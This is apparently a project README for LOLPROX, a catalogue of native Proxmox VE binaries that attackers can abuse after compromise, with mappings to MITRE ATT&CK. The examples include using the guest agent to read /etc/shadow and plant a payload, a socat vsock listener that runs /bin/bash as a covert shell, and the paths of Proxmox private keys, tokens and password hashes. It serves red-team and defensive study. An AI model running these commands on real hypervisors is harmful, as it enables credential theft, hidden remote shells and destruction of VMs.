Living Off The Land Proxmox (LOLPROX) is the curated catalog of native Proxmox VE binaries and techniques that adversaries can abuse for post-exploitation operations.
This project maintains a comprehensive list of binaries natively available in Proxmox VE that can be leveraged by adversaries during security assessments and red team operations. The documentation is compiled from real-world testing and threat research.
For the full write-up on LOLPROX techniques and methodology, see the blog post. For defensive guidance and detection strategies, see the defense blog post.
LOLPROX documents native Proxmox VE tools and techniques that can be abused for:
- Discovery - Enumerate VMs, containers, storage, users, and cluster topology
- Execution - Execute commands in guest VMs via QEMU guest agent
- Lateral Movement - Pivot through vsock, guest agents, and cluster connections
- Collection - Exfiltrate data via backups, snapshots, and guest agent file reads
- Credential Access - Extract certificates, API tokens, and authentication keys
- Persistence - Create backdoor accounts, API tokens, and scheduled tasks
- Impact - Stop/destroy VMs, manipulate storage, ransomware preparation
| Binary | Description | Primary Abuse |
|---|---|---|
| pvesh | API shell tool | Full API access, guest agent abuse |
| qm | QEMU VM manager | Guest agent execution, snapshots |
| pct | Container manager | Container exec, host mounts |
| pveum | User manager | Account creation, ACL abuse |
| pvesm | Storage manager | Storage enumeration, exfil |
| vzdump | Backup utility | Full VM exfiltration |
| pvecm | Cluster manager | Cluster topology discovery |
| pveversion | Version info | Target fingerprinting |
| socat | Relay tool | vsock covert channels |
| pveproxy | API daemon | Certificate/key theft |
| pve-firewall | Firewall manager | Security control bypass |
| pvesr | Storage replication | Replication topology |
The QEMU guest agent allows hypervisor-to-guest command execution without network authentication:
# Execute commands in guest
qm guest exec 100 -- cat /etc/shadow
# Read files from guest
qm guest cmd 100 file-read /etc/passwd
# Write files to guest
qm guest cmd 100 file-write /tmp/payload.sh $(base64 -w0 payload.sh)vsock (AF_VSOCK) enables host-guest communication bypassing network monitoring:
# Host: Connect to VM CID 3 on port 1234
socat - VSOCK-CONNECT:3:1234
# Guest: Listen for vsock connections
socat VSOCK-LISTEN:1234,fork EXEC:/bin/bashCritical cryptographic material locations:
/etc/pve/priv/pve-root-ca.key # Root CA private key
/etc/pve/priv/authkey.key # Authentication ticket signing key
/etc/pve/local/pve-ssl.key # Node SSL private key
/etc/pve/priv/token.cfg # API tokens/etc/pve/user.cfg # User configuration
/etc/pve/priv/shadow.cfg # User password hashes (if local auth)
/etc/pve/priv/token.cfg # API tokens
/etc/pve/corosync.conf # Cluster node addresses| Technique | ID | LOLPROX Tools |
|---|---|---|
| System Information Discovery | T1082 | pveversion, pvesh, qm, pct |
| Account Discovery | T1087.001 | pveum, pvesh |
| Permission Groups Discovery | T1069.001 | pveum, pvesh |
| Command and Scripting Interpreter | T1059 | qm guest exec, pct exec |
| Lateral Movement | T1021 | qm guest agent, vsock |
| Data from Local System | T1005 | qm guest cmd file-read |
| Archive Collected Data | T1074.001 | vzdump, qm snapshot |
| Create Account | T1136.001 | pveum, pvesh |
| Account Manipulation | T1098 | pveum acl |
| Unsecured Credentials | T1552 | /etc/pve/priv/* |
| Impair Defenses | T1562.004 | pve-firewall |
| System Shutdown/Reboot | T1529 | qm stop, pct stop |
| Data Destruction | T1485 | qm destroy, pct destroy |
Contributions are welcome! Please follow the LOLESXi format for new technique submissions:
- Fork the repository
- Add new binary documentation in
_lolprox/Binaries/ - Include MITRE ATT&CK mappings
- Provide procedural examples
- Submit a pull request
MIT